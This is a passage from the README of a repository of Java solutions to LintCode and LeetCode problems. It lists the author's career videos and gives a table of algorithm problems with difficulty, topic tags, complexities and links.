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(Google vs Amazon) | How much do I make as a Software Engineer (2021)](https://youtu.be/nmgyT_m1j3s) * [为什么我选择放弃亚马逊的工作 | Why I left Amazon as a Software Engineer (2021)](https://youtu.be/BBpivK4I_8U) * [曾经的留级生, 今天一线大厂软件工程师! | The making of a software engineer(2021)](https://youtu.be/cACqlpXKRpY) * [看了这些, 还想去美国留学吗? 我的留学经历 (2020)](https://youtu.be/XqOA5q5Rtpw) * [如何拿到亚马逊的工作! How succeed in Amazon Interview! (2019)](https://youtu.be/NIuOjjKaK9M) * [十分钟学会Python? (2019)](https://youtu.be/DRQYOdO9BAU) * [刚到美国到底怎样开口说英文? (2019)](https://youtu.be/pd3WR5K-bLs) 希望大家学习顺利, 对未来充满希望! # 002 | 目录 Java Algorithm Problems | Leetcode# | Problem | Level | Tags | Time | Space | Language | Sequence | |:---------:|:------------|:------:|:----:|-----:|------:|:--------:|---------:| |N/A|[Jump Game II.java](https://github.com/awangdev/LintCode/blob/master/Java/Jump%20Game%20II.java)|Hard|[Array, Coordinate DP, DP, Greedy]|O(n)|O(1)|Java|0| |N/A|[Majority Number II.java](https://github.com/awangdev/LintCode/blob/master/Java/Majority%20Number%20II.java)|Medium|[Enumeration, Greedy]|||Java|1| |N/A|[Search a 2D Matrix II.java](https://github.com/awangdev/LintCode/blob/master/Java/Search%20a%202D%20Matrix%20II.java)|Medium|[Binary Search, Divide and Conquer]|||Java|2| |N/A|[Missing Ranges.java](https://github.com/awangdev/LintCode/blob/master/Java/Missing%20Ranges.java)|Medium|[Array]|||Java|3| |N/A|[Inorder Successor in BST.java](https://github.com/awangdev/LintCode/blob/master/Java/Inorder%20Successor%20in%20BST.java)|Medium|[BST, Tree]|||Java|4| |N/A|[Convert Integer A to Integer B.java](https://github.com/awangdev/LintCode/blob/master/Java/Convert%20Integer%20A%20to%20Integer%20B.java)|Easy|[Bit Manipulation]|||Java|5| |N/A|[Backpack VI.java](https://github.com/awangdev/LintCode/blob/master/Java/Backpack%20VI.java)|Medium|[Backpack DP, DP]|||Java|6| |N/A|[Total Occurrence of Target.java](https://github.com/awangdev/LintCode/blob/master/Java/Total%20Occurrence%20of%20Target.java)|Medium|[]|||Java|7| |N/A|[House Robber III.java](https://github.com/awangdev/LintCode/blob/master/Java/House%20Robber%20III.java)|Medium|[DFS, DP, Status DP, Tree]|||Java|8| |N/A|[Binary Tree Maximum Path Sum II.java](https://github.com/awangdev/LintCode/blob/master/Java/Binary%20Tree%20Maximum%20Path%20Sum%20II.java)|Medium|[DFS, Tree]|||Java|9| |N/A|[Backpack V.java](https://github.com/awangdev/LintCode/blob/master/Java/Backpack%20V.java)|Medium|[Backpack DP, DP]|||Java|10| |N/A|[Closest Number in Sorted Array.java](https://github.com/awangdev/LintCode/blob/master/Java/Closest%20Number%20in%20Sorted%20Array.java)|Easy|[Binary Search]|||Java|11| |N/A|[Convert Expression to Polish Notation.java](https://github.com/awangdev/LintCode/blob/master/Java/Convert%20Expression%20to%20Polish%20Notation.java)|Hard|[Binary Tree, DFS, Expression Tree, Stack]|||Java|12| |N/A|[Missing Number.java](https://github.com/awangdev/LintCode/blob/master/Java/Missing%20Number.java)|Easy|[Array, Bit Manipulation, Math]|||Java|13| |N/A|[Restore IP Addresses.java](https://github.com/awangdev/LintCode/blob/master/Java/Restore%20IP%20Addresses.java)|Medium|[Backtracking, DFS, String]|||Java|14| |N/A|[Linked List Cycle II.java](https://github.com/awangdev/LintCode/blob/master/Java/Linked%20List%20Cycle%20II.java)|Medium|[Linked List, Math, Two Pointers]|||Java|15| |N/A|[Unique Binary Search Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Unique%20Binary%20Search%20Tree.java)|Medium|[BST, DP, Tree]|||Java|16| |N/A|[Largest Number.java](https://github.com/awangdev/LintCode/blob/master/Java/Largest%20Number.java)|Medium|[Sort]|||Java|17| |N/A|[Reverse String.java](https://github.com/awangdev/LintCode/blob/master/Java/Reverse%20String.java)|Easy|[String, Two Pointers]|||Java|18| |N/A|[Triangles.java](https://github.com/awangdev/LintCode/blob/master/Java/Triangles.java)|Medium|[Array, Coordinate DP, DFS, DP, Memoization]|||Java|19| |N/A|[Frog Jump.java](https://github.com/awangdev/LintCode/blob/master/Java/Frog%20Jump.java)|Hard|[DP, Hash Table]|||Java|20| |N/A|[Summary Ranges.java](https://github.com/awangdev/LintCode/blob/master/Java/Summary%20Ranges.java)|Medium|[Array]|||Java|21| |N/A|[Sliding Window Median.java](https://github.com/awangdev/LintCode/blob/master/Java/Sliding%20Window%20Median.java)|Hard|[Design, Heap, MaxHeap, MinHeap, Sliding Window]|||Java|22| |N/A|[Single Number III.java](https://github.com/awangdev/LintCode/blob/master/Java/Single%20Number%20III.java)|Medium|[Bit Manipulation]|||Java|23| |N/A|[Trailing Zeros.java](https://github.com/awangdev/LintCode/blob/master/Java/Trailing%20Zeros.java)|Easy|[Math]|||Java|24| |N/A|[Fast Power.java](https://github.com/awangdev/LintCode/blob/master/Java/Fast%20Power.java)|Medium|[DFS, Divide and Conquer]|||Java|25| |N/A|[Perfect Rectangle.java](https://github.com/awangdev/LintCode/blob/master/Java/Perfect%20Rectangle.java)|Hard|[Design, Geometry, Hash Table]|||Java|26| |N/A|[Total Hamming Distance.java](https://github.com/awangdev/LintCode/blob/master/Java/Total%20Hamming%20Distance.java)|Medium|[Bit Manipulation]|O(n)|O(1), 32-bit array|Java|27| |N/A|[Word Pattern.java](https://github.com/awangdev/LintCode/blob/master/Java/Word%20Pattern.java)|Easy|[]|||Java|28| |N/A|[Two Sum IV - Input is a BST.java](https://github.com/awangdev/LintCode/blob/master/Java/Two%20Sum%20IV%20-%20Input%20is%20a%20BST.java)|Easy|[Tree]|||Java|29| |N/A|[Count 1 in Binary.java](https://github.com/awangdev/LintCode/blob/master/Java/Count%201%20in%20Binary.java)|Easy|[Bit Manipulation]|||Java|30| |N/A|[Two Lists Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/Two%20Lists%20Sum.java)|Medium|[Linked List]|||Java|31| |N/A|[Flatten 2D Vector.java](https://github.com/awangdev/LintCode/blob/master/Java/Flatten%202D%20Vector.java)|Medium|[Design]|||Java|32| |N/A|[Hamming Distance.java](https://github.com/awangdev/LintCode/blob/master/Java/Hamming%20Distance.java)|Easy|[]|||Java|33| |N/A|[Find the Weak Connected Component in the Directed Graph.java](https://github.com/awangdev/LintCode/blob/master/Java/Find%20the%20Weak%20Connected%20Component%20in%20the%20Directed%20Graph.java)|Medium|[Union Find]|||Java|34| |N/A|[Interval Minimum Number.java](https://github.com/awangdev/LintCode/blob/master/Java/Interval%20Minimum%20Number.java)|Medium|[Binary Search, Divide and Conquer, Lint, Segment Tree]|||Java|35| |N/A|[Stone Game.java](https://github.com/awangdev/LintCode/blob/master/Java/Stone%20Game.java)|Medium|[DP]|||Java|36| |N/A|[Longest Increasing Continuous subsequence II.java](https://github.com/awangdev/LintCode/blob/master/Java/Longest%20Increasing%20Continuous%20subsequence%20II.java)|Medium|[Array, Coordinate DP, DP, Memoization]|||Java|37| |N/A|[Plus One.java](https://github.com/awangdev/LintCode/blob/master/Java/Plus%20One.java)|Easy|[Array, Math]|||Java|38| |N/A|[Paint Fence.java](https://github.com/awangdev/LintCode/blob/master/Java/Paint%20Fence.java)|Easy|[DP, Sequence DP]|O(n)|O(n)|Java|39| |N/A|[Line Reflection.java](https://github.com/awangdev/LintCode/blob/master/Java/Line%20Reflection.java)|Medium|[Hash Table, Math]|O(n)|O(n)|Java|40| |N/A|[Binary Representation.java](https://github.com/awangdev/LintCode/blob/master/Java/Binary%20Representation.java)|Hard|[Bit Manipulation, String]|||Java|41| |N/A|[Longest Consecutive Sequence.java](https://github.com/awangdev/LintCode/blob/master/Java/Longest%20Consecutive%20Sequence.java)|Hard|[Array, Hash Table, Union Find]|||Java|42| |N/A|[Find Minimum in Rotated Sorted Array.java](https://github.com/awangdev/LintCode/blob/master/Java/Find%20Minimum%20in%20Rotated%20Sorted%20Array.java)|Medium|[Array, Binary Search]|||Java|43| |N/A|[Binary Tree Longest Consecutive Sequence II.java](https://github.com/awangdev/LintCode/blob/master/Java/Binary%20Tree%20Longest%20Consecutive%20Sequence%20II.java)|Medium|[DFS, Divide and Conquer, Double Recursive, Tree]|||Java|44| |N/A|[Minimum Subarray.java](https://github.com/awangdev/LintCode/blob/master/Java/Minimum%20Subarray.java)|Easy|[Array, DP, Greedy, Sequence DP, Subarray]|O(m)|O(1)|Java|45| |N/A|[Connecting Graph.java](https://github.com/awangdev/LintCode/blob/master/Java/Connecting%20Graph.java)|Medium|[Union Find]|||Java|46| |N/A|[Count of Smaller Number.java](https://github.com/awangdev/LintCode/blob/master/Java/Count%20of%20Smaller%20Number.java)|Medium|[Binary Search, Lint, Segment Tree]|||Java|47| |N/A|[Binary Gap.java](https://github.com/awangdev/LintCode/blob/master/Java/Binary%20Gap.java)|Easy|[Bit Manipulation]|O(n), n = # of bits|O(1)|Java|48| |N/A|[Flip Game II.java](https://github.com/awangdev/LintCode/blob/master/Java/Flip%20Game%20II.java)|Medium|[Backtracking, DFS, DP]|||Java|49| |N/A|[Subtree of Another Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Subtree%20of%20Another%20Tree.java)|Easy|[DFS, Divide and Conquer, Tree]|||Java|50| |N/A|[Binary Tree Level Order Traversal II.java](https://github.com/awangdev/LintCode/blob/master/Java/Binary%20Tree%20Level%20Order%20Traversal%20II.java)|Medium|[BFS, Tree]|||Java|51| |N/A|[Maximum Average Subarray I.java](https://github.com/awangdev/LintCode/blob/master/Java/Maximum%20Average%20Subarray%20I.java)|Easy|[Array, Subarray]|O(n)|O(1)|Java|52| |N/A|[IndexMatch.java](https://github.com/awangdev/LintCode/blob/master/Java/IndexMatch.java)|Easy|[]|||Java|53| |N/A|[Walls and Gates.java](https://github.com/awangdev/LintCode/blob/master/Java/Walls%20and%20Gates.java)|Medium|[BFS, DFS]|||Java|54| |N/A|[Decode String.java](https://github.com/awangdev/LintCode/blob/master/Java/Decode%20String.java)|Medium|[DFS, Divide and Conquer, Stack]|||Java|55| |N/A|[The Maze.java](https://github.com/awangdev/LintCode/blob/master/Java/The%20Maze.java)|Medium|[BFS, DFS]|||Java|56| |N/A|[Palindromic Substrings.java](https://github.com/awangdev/LintCode/blob/master/Java/Palindromic%20Substrings.java)|Medium|[DP, String]|||Java|57| |N/A|[Rearrange String k Distance Apart.java](https://github.com/awangdev/LintCode/blob/master/Java/Rearrange%20String%20k%20Distance%20Apart.java)|Hard|[Greedy, Hash Table, Heap]|||Java|58| |N/A|[Count and Say.java](https://github.com/awangdev/LintCode/blob/master/Java/Count%20and%20Say.java)|Easy|[Basic Implementation, String]|||Java|59| |N/A|[Median of Two Sorted Arrays.java](https://github.com/awangdev/LintCode/blob/master/Java/Median%20of%20Two%20Sorted%20Arrays.java)|Hard|[Array, Binary Search, DFS, Divide and Conquer]|||Java|60| |N/A|[Perfect Squares.java](https://github.com/awangdev/LintCode/blob/master/Java/Perfect%20Squares.java)|Medium|[BFS, DP, Math, Partition DP]|||Java|61| |N/A|[Word Search.java](https://github.com/awangdev/LintCode/blob/master/Java/Word%20Search.java)|Medium|[Array, Backtracking, DFS]|||Java|62| |N/A|[Backpack II.java](https://github.com/awangdev/LintCode/blob/master/Java/Backpack%20II.java)|Medium|[Backpack DP, DP]|||Java|63| |N/A|[Reshape the Matrix.java](https://github.com/awangdev/LintCode/blob/master/Java/Reshape%20the%20Matrix.java)|Easy|[]|||Java|64| |N/A|[Update Bits.java](https://github.com/awangdev/LintCode/blob/master/Java/Update%20Bits.java)|Medium|[Bit Manipulation]|||Java|65| |N/A|[Triangle Count.java](https://github.com/awangdev/LintCode/blob/master/Java/Triangle%20Count.java)|Medium|[Array]|||Java|66| |N/A|[Remove Duplicate Letters.java](https://github.com/awangdev/LintCode/blob/master/Java/Remove%20Duplicate%20Letters.java)|Hard|[Greedy, Hash Table, Stack]|||Java|67| |N/A|[Permutation Sequence.java](https://github.com/awangdev/LintCode/blob/master/Java/Permutation%20Sequence.java)|Medium|[Backtracking, Math]|||Java|68| |N/A|[House Robber II.java](https://github.com/awangdev/LintCode/blob/master/Java/House%20Robber%20II.java)|Medium|[DP, Sequence DP, Status DP]|||Java|69| |N/A|[O(1) Check Power of 2.java](https://github.com/awangdev/LintCode/blob/master/Java/O(1)%20Check%20Power%20of%202.java)|Easy|[Bit Manipulation]|||Java|70| |N/A|[Letter Combinations of a Phone Number.java](https://github.com/awangdev/LintCode/blob/master/Java/Letter%20Combinations%20of%20a%20Phone%20Number.java)|Medium|[Backtracking, String]|||Java|71| |N/A|[Backspace String Compare.java](https://github.com/awangdev/LintCode/blob/master/Java/Backspace%20String%20Compare.java)|Easy|[Stack, Two Pointers]|||Java|72| |N/A|[Minimum Size Subarray Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/Minimum%20Size%20Subarray%20Sum.java)|Medium|[Array, Binary Search, Subarray, Two Pointers]|O(n)|O(1)|Java|73| |N/A|[Implement Stack using Queues.java](https://github.com/awangdev/LintCode/blob/master/Java/Implement%20Stack%20using%20Queues.java)|Easy|[Design, Stack]|||Java|74| |N/A|[Minimum Absolute Difference in BST.java](https://github.com/awangdev/LintCode/blob/master/Java/Minimum%20Absolute%20Difference%20in%20BST.java)|Easy|[BST]|||Java|75| |N/A|[Maximum Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Maximum%20Binary%20Tree.java)|Medium|[Stack, Tree]|||Java|76| |N/A|[ColorGrid.java](https://github.com/awangdev/LintCode/blob/master/Java/ColorGrid.java)|Medium|[Design, Hash Table]|||Java|77| |N/A|[HashWithArray.java](https://github.com/awangdev/LintCode/blob/master/Java/HashWithArray.java)|Easy|[]|||Java|78| |N/A|[Flood Fill.java](https://github.com/awangdev/LintCode/blob/master/Java/Flood%20Fill.java)|Easy|[DFS]|||Java|79| |N/A|[Construct Binary Tree from Inorder and Postorder Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/Construct%20Binary%20Tree%20from%20Inorder%20and%20Postorder%20Traversal.java)|Medium|[Array, DFS, Divide and Conquer, Tree]|||Java|80| |N/A|[Backpack.java](https://github.com/awangdev/LintCode/blob/master/Java/Backpack.java)|Medium|[Backpack DP, DP]|||Java|81| |N/A|[Longest Common Subsequence.java](https://github.com/awangdev/LintCode/blob/master/Java/Longest%20Common%20Subsequence.java)|Medium|[DP, Double Sequence DP, Sequence DP]|||Java|82| |N/A|[Peeking Iterator.java](https://github.com/awangdev/LintCode/blob/master/Java/Peeking%20Iterator.java)|Medium|[Design]|||Java|83| |N/A|[Orderly Queue.java](https://github.com/awangdev/LintCode/blob/master/Java/Orderly%20Queue.java)|Hard|[Math, String]|||Java|84| |N/A|[QuickSort.java](https://github.com/awangdev/LintCode/blob/master/Java/QuickSort.java)|Medium|[Quick Sort, Sort]|||Java|85| |N/A|[Maximal Rectangle.java](https://github.com/awangdev/LintCode/blob/master/Java/Maximal%20Rectangle.java)|Hard|[Array, DP, Hash Table, Stack]|||Java|86| |N/A|[Expression Evaluation.java](https://github.com/awangdev/LintCode/blob/master/Java/Expression%20Evaluation.java)|Hard|[Binary Tree, DFS, Expression Tree, Minimum Binary Tree, Stack]|||Java|87| |N/A|[Subtree.java](https://github.com/awangdev/LintCode/blob/master/Java/Subtree.java)|Easy|[DFS, Tree]|||Java|88| |N/A|[LFU Cache.java](https://github.com/awangdev/LintCode/blob/master/Java/LFU%20Cache.java)|Hard|[Design, Hash Table]|||Java|89| |N/A|[Cosine Similarity.java](https://github.com/awangdev/LintCode/blob/master/Java/Cosine%20Similarity.java)|Easy|[Basic Implementation]|||Java|90| |N/A|[Scramble String.java](https://github.com/awangdev/LintCode/blob/master/Java/Scramble%20String.java)|Hard|[DP, Interval DP, String]|||Java|91| |N/A|[Redundant Connection.java](https://github.com/awangdev/LintCode/blob/master/Java/Redundant%20Connection.java)|Medium|[BFS, DFS, Graph, Tree, Union Find]|||Java|92| |N/A|[Rotate List.java](https://github.com/awangdev/LintCode/blob/master/Java/Rotate%20List.java)|Medium|[Linked List, Two Pointers]|||Java|93| |N/A|[Swap Nodes in Pairs.java](https://github.com/awangdev/LintCode/blob/master/Java/Swap%20Nodes%20in%20Pairs.java)|Medium|[Linked List]|||Java|94| |N/A|[Longest Increasing Continuous subsequence.java](https://github.com/awangdev/LintCode/blob/master/Java/Longest%20Increasing%20Continuous%20subsequence.java)|Easy|[Array, Coordinate DP, DP]|||Java|95| |N/A|[K Edit Distance.java](https://github.com/awangdev/LintCode/blob/master/Java/K%20Edit%20Distance.java)|Hard|[DP, Double Sequence DP, Sequence DP, Trie]|||Java|96| |N/A|[Combinations.java](https://github.com/awangdev/LintCode/blob/master/Java/Combinations.java)|Medium|[Backtracking, Combination, DFS]|||Java|97| |N/A|[Max Area of Island.java](https://github.com/awangdev/LintCode/blob/master/Java/Max%20Area%20of%20Island.java)|Easy|[Array, DFS]|||Java|98| |N/A|[Sort List.java](https://github.com/awangdev/LintCode/blob/master/Java/Sort%20List.java)|Medium|[Divide and Conquer, Linked List, Merge Sort, Sort]|||Java|99| |N/A|[Find Peak Element.java](https://github.com/awangdev/LintCode/blob/master/Java/Find%20Peak%20Element.java)|Medium|[Array, Binary Search]|||Java|100| |N/A|[Word Search II.java](https://github.com/awangdev/LintCode/blob/master/Java/Word%20Search%20II.java)|Hard|[Backtracking, DFS, Trie]|||Java|101| |N/A|[K Empty Slots.java](https://github.com/awangdev/LintCode/blob/master/Java/K%20Empty%20Slots.java)|Hard|[Array, BST, TreeSet]|||Java|102| |N/A|[Gray Code.java](https://github.com/awangdev/LintCode/blob/master/Java/Gray%20Code.java)|Medium|[Backtracking]|||Java|103| |N/A|[Encode and Decode TinyURL.java](https://github.com/awangdev/LintCode/blob/master/Java/Encode%20and%20Decode%20TinyURL.java)|Medium|[Hash Table, Math]|||Java|104| |N/A|[Game of Life.java](https://github.com/awangdev/LintCode/blob/master/Java/Game%20of%20Life.java)|Medium|[Array]|||Java|105| |N/A|[Compare Version Numbers.java](https://github.com/awangdev/LintCode/blob/master/Java/Compare%20Version%20Numbers.java)|Medium|[String]|||Java|106| |N/A|[Singleton.java](https://github.com/awangdev/LintCode/blob/master/Java/Singleton.java)|Easy|[Design]|||Java|107| |N/A|[Ugly Number.java](https://github.com/awangdev/LintCode/blob/master/Java/Ugly%20Number.java)|Medium|[Math]|||Java|108| |N/A|[Russian Doll Envelopes.java](https://github.com/awangdev/LintCode/blob/master/Java/Russian%20Doll%20Envelopes.java)|Hard|[Binary Search, Coordinate DP, DP]|||Java|109| |N/A|[Rehashing.java](https://github.com/awangdev/LintCode/blob/master/Java/Rehashing.java)|Medium|[Hash Table]|||Java|110| |N/A|[Kth Smallest Sum In Two Sorted Arrays.java](https://github.com/awangdev/LintCode/blob/master/Java/Kth%20Smallest%20Sum%20In%20Two%20Sorted%20Arrays.java)|Hard|[]|||Java|111| |N/A|[Longest Common Substring.java](https://github.com/awangdev/LintCode/blob/master/Java/Longest%20Common%20Substring.java)|Medium|[DP, Double Sequence DP, Sequence DP, String]|||Java|112| |N/A|[Rotate Image.java](https://github.com/awangdev/LintCode/blob/master/Java/Rotate%20Image.java)|Medium|[Array, Enumeration]|||Java|113| |N/A|[Backpack III.java](https://github.com/awangdev/LintCode/blob/master/Java/Backpack%20III.java)|Hard|[Backpack DP, DP]|||Java|114| |N/A|[Combination Sum IV.java](https://github.com/awangdev/LintCode/blob/master/Java/Combination%20Sum%20IV.java)|Medium|[Array, Backpack DP, DP]|||Java|115| |N/A|[Number of Longest Increasing Subsequence.java](https://github.com/awangdev/LintCode/blob/master/Java/Number%20of%20Longest%20Increasing%20Subsequence.java)|Medium|[Coordinate DP, DP]|O(n^2)||Java|116| |N/A|[Permutation Index.java](https://github.com/awangdev/LintCode/blob/master/Java/Permutation%20Index.java)|Easy|[]|||Java|117| |N/A|[4Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/4Sum.java)|Medium|[Hash Table]|||Java|118| |N/A|[Shortest Palindrome.java](https://github.com/awangdev/LintCode/blob/master/Java/Shortest%20Palindrome.java)|Hard|[KMP, String]|||Java|119| |N/A|[Convert Sorted Array to Binary Search Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Convert%20Sorted%20Array%20to%20Binary%20Search%20Tree.java)|Easy|[DFS, Divide and Conquer, Tree]|||Java|120| |N/A|[Populating Next Right Pointers in Each Node.java](https://github.com/awangdev/LintCode/blob/master/Java/Populating%20Next%20Right%20Pointers%20in%20Each%20Node.java)|Medium|[DFS, Divide and Conquer, Tree]|||Java|121| |N/A|[Space Replacement.java](https://github.com/awangdev/LintCode/blob/master/Java/Space%20Replacement.java)|Medium|[String]|||Java|122| |N/A|[Contiguous Array.java](https://github.com/awangdev/LintCode/blob/master/Java/Contiguous%20Array.java)|Medium|[Hash Table]|||Java|123| |N/A|[Reverse Linked List II .java](https://github.com/awangdev/LintCode/blob/master/Java/Reverse%20Linked%20List%20II%20.java)|Medium|[Linked List]|||Java|124| |N/A|[Palindrome Pairs.java](https://github.com/awangdev/LintCode/blob/master/Java/Palindrome%20Pairs.java)|Hard|[Hash Table, String, Trie]|||Java|125| |N/A|[Find Peak Element II.java](https://github.com/awangdev/LintCode/blob/master/Java/Find%20Peak%20Element%20II.java)|Hard|[Binary Search, DFS, Divide and Conquer]|||Java|126| |N/A|[Minimum Height Trees.java](https://github.com/awangdev/LintCode/blob/master/Java/Minimum%20Height%20Trees.java)|Medium|[BFS, Graph]|||Java|127| |N/A|[Longest Substring Without Repeating Characters.java](https://github.com/awangdev/LintCode/blob/master/Java/Longest%20Substring%20Without%20Repeating%20Characters.java)|Medium|[Hash Table, String, Two Pointers]|||Java|128| |N/A|[Fraction to Recurring Decimal.java](https://github.com/awangdev/LintCode/blob/master/Java/Fraction%20to%20Recurring%20Decimal.java)|Medium|[Hash Table, Math]|||Java|129| |N/A|[Wiggle Sort.java](https://github.com/awangdev/LintCode/blob/master/Java/Wiggle%20Sort.java)|Medium|[Array, Sort]|||Java|130| |N/A|[Reverse Words in a String II.java](https://github.com/awangdev/LintCode/blob/master/Java/Reverse%20Words%20in%20a%20String%20II.java)|Medium|[String]|||Java|131| |N/A|[Remove Node in Binary Search Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Remove%20Node%20in%20Binary%20Search%20Tree.java)|Hard|[BST]|||Java|132| |N/A|[Reorder List.java](https://github.com/awangdev/LintCode/blob/master/Java/Reorder%20List.java)|Medium|[Linked List]|||Java|133| |N/A|[Redundant Connection II.java](https://github.com/awangdev/LintCode/blob/master/Java/Redundant%20Connection%20II.java)|Hard|[DFS, Graph, Tree, Union Find]|||Java|134| |N/A|[[tool] Quick Select - Median.java](https://github.com/awangdev/LintCode/blob/master/Java/[tool]%20Quick%20Select%20-%20Median.java)|Easy|[Array, Lint, Quick Select, Quick Sort, Two Pointers]|O(n)|O(logN)|Java|135| |N/A|[Swap Bits.java](https://github.com/awangdev/LintCode/blob/master/Java/Swap%20Bits.java)|Easy|[Bit Manipulation]|||Java|136| |N/A|[Friends Of Appropriate Ages.java](https://github.com/awangdev/LintCode/blob/master/Java/Friends%20Of%20Appropriate%20Ages.java)|Medium|[Array, Math]|||Java|137| |N/A|[Longest Increasing Subsequence.java](https://github.com/awangdev/LintCode/blob/master/Java/Longest%20Increasing%20Subsequence.java)|Medium|[Binary Search, Coordinate DP, DP, Memoization]|O(n^2) dp, O(nLogN) binary search|O(n)|Java|138| |N/A|[Power of Two.java](https://github.com/awangdev/LintCode/blob/master/Java/Power%20of%20Two.java)|Easy|[Bit Manipulation, Math]|||Java|139| |N/A|[Min Stack.java](https://github.com/awangdev/LintCode/blob/master/Java/Min%20Stack.java)|Easy|[Design, Stack]|||Java|140| |N/A|[Count of Smaller Number before itself.java](https://github.com/awangdev/LintCode/blob/master/Java/Count%20of%20Smaller%20Number%20before%20itself.java)|Hard|[]|||Java|141| |N/A|[Majority Number III.java](https://github.com/awangdev/LintCode/blob/master/Java/Majority%20Number%20III.java)|Medium|[Hash Table, Linked List]|||Java|142| |N/A|[Number of Digit One.java](https://github.com/awangdev/LintCode/blob/master/Java/Number%20of%20Digit%20One.java)|Hard|[Math]|||Java|143| |N/A|[Tweaked Identical Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Tweaked%20Identical%20Binary%20Tree.java)|Easy|[DFS, Tree]|||Java|144| |N/A|[Search Range in Binary Search Tree .java](https://github.com/awangdev/LintCode/blob/master/Java/Search%20Range%20in%20Binary%20Search%20Tree%20.java)|Medium|[BST, Binary Tree]|||Java|145| |N/A|[Best Time to Buy and Sell Stock III.java](https://github.com/awangdev/LintCode/blob/master/Java/Best%20Time%20to%20Buy%20and%20Sell%20Stock%20III.java)|Hard|[Array, DP, Sequence DP]|||Java|146| |N/A|[Design Search Autocomplete System.java](https://github.com/awangdev/LintCode/blob/master/Java/Design%20Search%20Autocomplete%20System.java)|Hard|[Design, Hash Table, MinHeap, PriorityQueue, Trie]|input: O(x), where x = possible words, constructor: O(mn) m = max length, n = # of words|O(n^2), n = # of possible words, n = # of trie levels; mainlay saving the `Map<S, freq>`|Java|147| |N/A|[Subsets II.java](https://github.com/awangdev/LintCode/blob/master/Java/Subsets%20II.java)|Medium|[Array, BFS, Backtracking, DFS]|O(2^n)||Java|148| |N/A|[One Edit Distance.java](https://github.com/awangdev/LintCode/blob/master/Java/One%20Edit%20Distance.java)|Medium|[String]|||Java|149| |N/A|[Segment Tree Modify.java](https://github.com/awangdev/LintCode/blob/master/Java/Segment%20Tree%20Modify.java)|Medium|[Binary Tree, DFS, Divide and Conquer, Lint, Segment Tree]|||Java|150| |N/A|[Distinct Subsequences.java](https://github.com/awangdev/LintCode/blob/master/Java/Distinct%20Subsequences.java)|Hard|[DP, String]|||Java|151| |N/A|[Insert Node in a Binary Search Tree .java](https://github.com/awangdev/LintCode/blob/master/Java/Insert%20Node%20in%20a%20Binary%20Search%20Tree%20.java)|Easy|[BST]|||Java|152| |N/A|[Container With Most Water.java](https://github.com/awangdev/LintCode/blob/master/Java/Container%20With%20Most%20Water.java)|Medium|[Array, Two Pointers]|||Java|153| |N/A|[Word Ladder.java](https://github.com/awangdev/LintCode/blob/master/Java/Word%20Ladder.java)|Medium|[BFS]|||Java|154| |N/A|[Single Number II.java](https://github.com/awangdev/LintCode/blob/master/Java/Single%20Number%20II.java)|Medium|[Bit Manipulation]|||Java|155| |N/A|[Heaters.java](https://github.com/awangdev/LintCode/blob/master/Java/Heaters.java)|Easy|[]|||Java|156| |N/A|[Kth Smallest Element in a BST.java](https://github.com/awangdev/LintCode/blob/master/Java/Kth%20Smallest%20Element%20in%20a%20BST.java)|Medium|[BST, DFS, Stack, Tree]|||Java|157| |N/A|[Robot Room Cleaner.java](https://github.com/awangdev/LintCode/blob/master/Java/Robot%20Room%20Cleaner.java)|Hard|[Backtracking, DFS]|||Java|158| |N/A|[Coins in a Line II.java](https://github.com/awangdev/LintCode/blob/master/Java/Coins%20in%20a%20Line%20II.java)|Medium|[Array, DP, Game Theory, Memoization, MiniMax]|||Java|159| |N/A|[Partition List.java](https://github.com/awangdev/LintCode/blob/master/Java/Partition%20List.java)|Medium|[Linked List, Two Pointers]|||Java|160| |N/A|[Classical Binary Search.java](https://github.com/awangdev/LintCode/blob/master/Java/Classical%20Binary%20Search.java)|Easy|[Binary Search]|||Java|161| |N/A|[Wood Cut.java](https://github.com/awangdev/LintCode/blob/master/Java/Wood%20Cut.java)|Medium|[Binary Search]|||Java|162| |N/A|[Connecting Graph III.java](https://github.com/awangdev/LintCode/blob/master/Java/Connecting%20Graph%20III.java)|Medium|[Union Find]|||Java|163| |N/A|[Invert Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/Invert%20Binary%20Tree.java)|Easy|[BFS, DFS, Tree]|||Java|164| |N/A|[Remove Duplicates from Unsorted List.java](https://github.com/awangdev/LintCode/blob/master/Java/Remove%20Duplicates%20from%20Unsorted%20List.java)|Medium|[Linked List]|||Java|165| |N/A|[Maximum Size Subarray Sum Equals k.java](https://github.com/awangdev/LintCode/blob/master/Java/Maximum%20Size%20Subarray%20Sum%20Equals%20k.java)|Medium|[Hash Table, PreSum, Subarray]|O(n)|O(n)|Java|166| |N/A|[The Smallest Difference.java](https://github.com/awangdev/LintCode/blob/master/Java/The%20Smallest%20Difference.java)|Medium|[Array, Sort, Two Pointers]|||Java|167| |N/A|[Unique Binary Search Tree II.java](https://github.com/awangdev/LintCode/blob/master/Java/Unique%20Binary%20Search%20Tree%20II.java)|Medium|[BST, DP, Divide and Conquer, Tree]|||Java|168| |N/A|[Encode and Decode Strings.java](https://github.com/awangdev/LintCode/blob/master/Java/Encode%20and%20Decode%20Strings.java)|Medium|[String]|||Java|169| |N/A|[Remove Duplicates from Sorted List II.java](https://github.com/awangdev/LintCode/blob/master/Java/Remove%20Duplicates%20from%20Sorted%20List%20II.java)|Medium|[Linked List]|||Java|170| |N/A|[Subarray Sum II.java](https://github.com/awangdev/LintCode/blob/master/Java/Subarray%20Sum%20II.java)|Hard|[Array, Binary Search, Two Pointers]|||Java|171| |N/A|[Matrix Zigzag Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/Matrix%20Zigzag%20Traversal.java)|Easy|[]|||Java|172| |N/A|[Ones and Zeroes.java](https://github.com/awangdev/LintCode/blob/master/Java/Ones%20and%20Zeroes.java)|Hard|[DP]|||Java|173| |N/A|[Number of Connected Components in an Undirected Graph.java](https://github.com/awangdev/LintCode/blob/master/Java/Number%20of%20Connected%20Components%20in%20an%20Undirected%20Graph.java)|Medium|[BFS, DFS, Graph, Union Find]|||Java|174| |N/A|[Submatrix 